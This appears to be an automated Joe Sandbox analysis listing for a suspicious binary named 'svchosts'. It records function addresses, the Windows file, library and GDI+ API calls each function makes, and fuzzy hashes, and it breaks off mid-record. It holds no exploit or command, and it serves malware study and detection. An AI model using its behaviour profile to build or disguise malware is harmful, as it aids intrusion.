Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 729e3f735648cfed2199b75b676b905e3109a5fec31f1099a44dfe8a181ea252
Instruction ID: 7b033424e063fadf82873df7b8422ba9004938139e13f320a6e38a0085f712bb
Opcode Fuzzy Hash: 729e3f735648cfed2199b75b676b905e3109a5fec31f1099a44dfe8a181ea252
Instruction Fuzzy Hash: A1F0C231131116A6CB212E25AC04FEB276C9FD17F0F288115F82C96191DE30CC30D9A5

Function 002A0908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 002A0915
GetProcessAffinityMask.KERNEL32(00000000), ref: 002A091C

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 26de1b5670051edf7facca5621e3b0a8be2fe6260f92f808a6b4c853fd997d9d
Instruction ID: 781d2612a4c8072fc038a87682ecd225cc591cf9d0f9b8c5b63b98d5590ca13d
Opcode Fuzzy Hash: 26de1b5670051edf7facca5621e3b0a8be2fe6260f92f808a6b4c853fd997d9d
Instruction Fuzzy Hash: 11E09233A2010BAB6F09DEA4AC489FB739DEB0A71472085B9A807D3201FD31DE1186A1

Function 002B79B7 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 002BB610: GetEnvironmentStringsW.KERNEL32 ref: 002BB619
Part of subcall function 002BB610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002BB63C
Part of subcall function 002BB610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 002BB662
Part of subcall function 002BB610: _free.LIBCMT ref: 002BB675
Part of subcall function 002BB610: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002BB684

_free.LIBCMT ref: 002B79FD
_free.LIBCMT ref: 002B7A04

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 400815659-0
Opcode ID: 2ec86c4aecc2524341ce6886498497bf873ba5084af54a1613b3e0eba12093a4
Instruction ID: f54b2e9292e4de6cfc22f2d5114f055947006c325c1558179d4a0b7403323780
Opcode Fuzzy Hash: 2ec86c4aecc2524341ce6886498497bf873ba5084af54a1613b3e0eba12093a4
Instruction Fuzzy Hash: B9E0E512939816459762767A2D026EF02088BC13F1B501726F914DB0C2DE908C320555

Function 0029A444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0029A27A,?,?,?,0029A113,?,00000001,00000000,?,?), ref: 0029A458
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0029A27A,?,?,?,0029A113,?,00000001,00000000,?,?), ref: 0029A489

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 87c35bb939708bfdd2a18440073fd74ba44740a9158349825f24a036b50d927b
Instruction ID: cd9e4f02515e320503b019c7149e6d72d70c3a2d789b0535344b567098354c85
Opcode Fuzzy Hash: 87c35bb939708bfdd2a18440073fd74ba44740a9158349825f24a036b50d927b
Instruction Fuzzy Hash: E8F0303225020DBBDF129F60EC45FEA776CBB04785F448051BC8896161DB769AB9AE90

Function 002AD573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 002AD5A1
SetDlgItemTextW.USER32(00000065,?), ref: 002AD5B8

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: ItemText_swprintf
String ID:
API String ID: 3011073432-0
Opcode ID: 28f81db731cc45a7271acc89310d3b31a2f8e20683e5bcbe70580fd49933e0d3
Instruction ID: c5fa6015bc7c7e2575a1d1146302f94f0e982f2724806ae700f43e82cacd5673
Opcode Fuzzy Hash: 28f81db731cc45a7271acc89310d3b31a2f8e20683e5bcbe70580fd49933e0d3
Instruction Fuzzy Hash: A0F05C719203487BEF11ABB09C06FAE375CAB06741F000592B605530A2DE716E309F61

Function 0029A12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,0029984C,?,?,00299688,?,?,?,?,002C1FA1,000000FF), ref: 0029A13E
DeleteFileW.KERNEL32(?,?,?,00000800,?,?,0029984C,?,?,00299688,?,?,?,?,002C1FA1,000000FF), ref: 0029A16C

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 19d458f844575f608eca95960aadf79194f778eb3fc0597d5fd1ae3701532c85
Instruction ID: ed594f9133982934168b1c1dcb59d08ccfe5acd070fa8d7da42c884f90dfc509
Opcode Fuzzy Hash: 19d458f844575f608eca95960aadf79194f778eb3fc0597d5fd1ae3701532c85
Instruction Fuzzy Hash: 99E092756502096BDF119F70EC45FF977ACBB08381F484065B888C3060DB629DA4AE90

Function 002AA39D Relevance: 3.0, APIs: 2, Instructions: 27comCOMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,002C1FA1,000000FF), ref: 002AA3D1
OleUninitialize.OLE32(?,?,?,?,002C1FA1,000000FF), ref: 002AA3D6

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: fd939c6d4c2577d98243868bfb10aab5d7bc5477c967add384ed07cede84f89c
Instruction ID: a03766cbf9bc87b8b149522d8b7c2ce54d8ca0260903a14278bbc89c4c75879a
Opcode Fuzzy Hash: fd939c6d4c2577d98243868bfb10aab5d7bc5477c967add384ed07cede84f89c
Instruction Fuzzy Hash: 2EF03072558654DFC710DB4CEC05B55FBA8FB4AB20F04436AF41983761CB746C11CA91

Function 0029A194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,0029A189,?,002976B2,?,?,?,?), ref: 0029A1A5
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0029A189,?,002976B2,?,?,?,?), ref: 0029A1D1

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 34f26c0bab6bbb85d7eb17ec93b71d0a3aa5cf2b223099fc356ccb15b541802c
Instruction ID: ebca456e83c486170f97233b209d1774a7611ec1da4ebca3eff1a4fa3cb5bdf4
Opcode Fuzzy Hash: 34f26c0bab6bbb85d7eb17ec93b71d0a3aa5cf2b223099fc356ccb15b541802c
Instruction Fuzzy Hash: 29E09B3651011857CF11EB64DC05FD5775CAB083E1F0041A2FD48D3190D7719D549AD0

Function 002A0085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002A00A0
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0029EB86,Crypt32.dll,00000000,0029EC0A,?,?,0029EBEC,?,?,?), ref: 002A00C2

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: ca375d96f1442dd9667630e9681795118843299ad9f5c2b52d5b0a173d37b406
Instruction ID: ac7a185971d1b5742545897f49e9cea19ba039e96ba59dbaf279254e6d9cace6
Opcode Fuzzy Hash: ca375d96f1442dd9667630e9681795118843299ad9f5c2b52d5b0a173d37b406
Instruction Fuzzy Hash: BCE0127691115C6BDF219AA4AC09FE7776CEF09382F0444A5B948D3104DA749A548FA0

Function 002A9B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 002A9B30
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 002A9B37

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 29ceaa01bb66ee53e3ec5d50be8a232272a2b63eb54dd1258beb555e72f679c0
Instruction ID: 1e942ba4847445150a0bf437721192ee42dee9f5633f802a156afb0cdac5cc84
Opcode Fuzzy Hash: 29ceaa01bb66ee53e3ec5d50be8a232272a2b63eb54dd1258beb555e72f679c0
Instruction Fuzzy Hash: 1DE0ED71921218EBCB10DF99D501B9AB7FCEB05321F20859FEC9593600DAB16E649FA1

Function 002B215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 002B329A: try_get_function.LIBVCRUNTIME ref: 002B32AF

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002B217A
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 002B2185

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: b6d464982d5cfab9ce14356d77ad1f18608b0f93673648d58cd9b22e30c9b103
Instruction ID: b70704ecdd009d383fdf453a6aa5bcc4c332f1243ff1256a26df807b81a9488a
Opcode Fuzzy Hash: b6d464982d5cfab9ce14356d77ad1f18608b0f93673648d58cd9b22e30c9b103
Instruction Fuzzy Hash: 83D0A974234306E46C186AB828424E933885963BF03F00B9AEB348A0E3EE10A03C6A11

Function 002ADC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadLock.DELAYIMP ref: 002ADC73
DloadProtectSection.DELAYIMP ref: 002ADC8F

Part of subcall function 002ADE67: DloadObtainSection.DELAYIMP ref: 002ADE77

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: Dload$Section$LockObtainProtect
String ID:
API String ID: 731663317-0
Opcode ID: 17e219af65a3352def00cb4101091351ef997f1d485d04a20981e6477e272afe
Instruction ID: 45159284de7b8469c25fa6b29c4b19a00e0cd96a08e0dc9f957e4a1dbd6504ca
Opcode Fuzzy Hash: 17e219af65a3352def00cb4101091351ef997f1d485d04a20981e6477e272afe
Instruction Fuzzy Hash: B6D0C9741202124BC211EB14AD8A72C22B1B7167E4FE40613F107C6DA2DFE844B0CA45

Function 002912E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 002912FB
ShowWindow.USER32(00000000), ref: 00291302

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 950d874bb44429334415db5189bfec22087711af9b19ec39db9939cc55909e3e
Instruction ID: 5791c03a79b4d4a2d32deb8d69a8dc1c82abbb92a837ba2468ae3ee61ecafe26
Opcode Fuzzy Hash: 950d874bb44429334415db5189bfec22087711af9b19ec39db9939cc55909e3e
Instruction Fuzzy Hash: 4AC01232058200FECB010BB0EC0DD3FBFA8ABA6222F05C928B2A9C0061C238C018DF11

Function 002919A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 002919AB

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f21529a0ecdf430a0bdac4439ab6703e9227e619ed1d07bedf29acd7c61f689d
Instruction ID: 3dafb24a250149cb5966c7ff341e6e525429722fa986443f33d560ebc479bf7c
Opcode Fuzzy Hash: f21529a0ecdf430a0bdac4439ab6703e9227e619ed1d07bedf29acd7c61f689d
Instruction Fuzzy Hash: 2AC10470A242469FEF15CF69C494BA97BA5EF0A304F0844BADC45DF282CB319D74CB62

Function 00293B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00293B42

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 3e218cb1fcb48ec31ab7b804cafa5ff34fa9acb1d7b53ae4b50814020c210f0e
Instruction ID: 1b57aab85cf2bb94fc4b175521c7fd39e380d3d181b16f48d4f6f3269cd70336
Opcode Fuzzy Hash: 3e218cb1fcb48ec31ab7b804cafa5ff34fa9acb1d7b53ae4b50814020c210f0e
Instruction Fuzzy Hash: FB71EE71124F44AEDF25DF34CC51AEBB7E8AF14301F44492EE5AB47242DA316A68CF20

Function 0029837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00298384

Part of subcall function 00291380: __EH_prolog.LIBCMT ref: 00291385
Part of subcall function 00291380: new.LIBCMT ref: 002913FE

Part of subcall function 002919A6: __EH_prolog.LIBCMT ref: 002919AB

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 5c1cbeec9eddc814267541008a4bd4cffe773bec0fcb59900b0963b943232dc3
Instruction ID: b4ce6698bb513adfb1ad6f0b155c2d599da7dcb238bae48cf11cb667d87888b5
Opcode Fuzzy Hash: 5c1cbeec9eddc814267541008a4bd4cffe773bec0fcb59900b0963b943232dc3
Instruction Fuzzy Hash: 0741A2318606599ADF20DB60CC55BEA73B8AF51300F0840EAE58AA7093DF745EE8DF50

Function 00291E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00291E05

Part of subcall function 00293B3D: __EH_prolog.LIBCMT ref: 00293B42

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 0a5901271da38ebb3e73691dbb0f26a618035eccb76d8e8ed5892a2e62a8209a
Instruction ID: c2c9ea09815c6fa33aed9be6fe70e747e6a9b6d58fb44b6bb28abeaef9005516
Opcode Fuzzy Hash: 0a5901271da38ebb3e73691dbb0f26a618035eccb76d8e8ed5892a2e62a8209a
Instruction Fuzzy Hash: 7521287292410A9FCF11EF9AD9519EEBBF5BF59300B1004AEE845A7251CB325E30CF60

Function 002AA7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 002AA7C8

Part of subcall function 00291380: __EH_prolog.LIBCMT ref: 00291385
Part of subcall function 00291380: new.LIBCMT ref: 002913FE

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 3905ec9d9bf2e5ff96629b47df979908476dea81e4bb25446e469ca0083a05aa
Instruction ID: 20bb75eb246db8cee153b06b4f1a182b14f3f1b734ccd596838966f3e9fb23c4
Opcode Fuzzy Hash: 3905ec9d9bf2e5ff96629b47df979908476dea81e4bb25446e469ca0083a05aa
Instruction Fuzzy Hash: 6E215C71C1424AAFCF14DF95C9529EEB7B4AF19300F0004EEE809A3242DB356E26CF61

Function 002992E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 002992EB

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
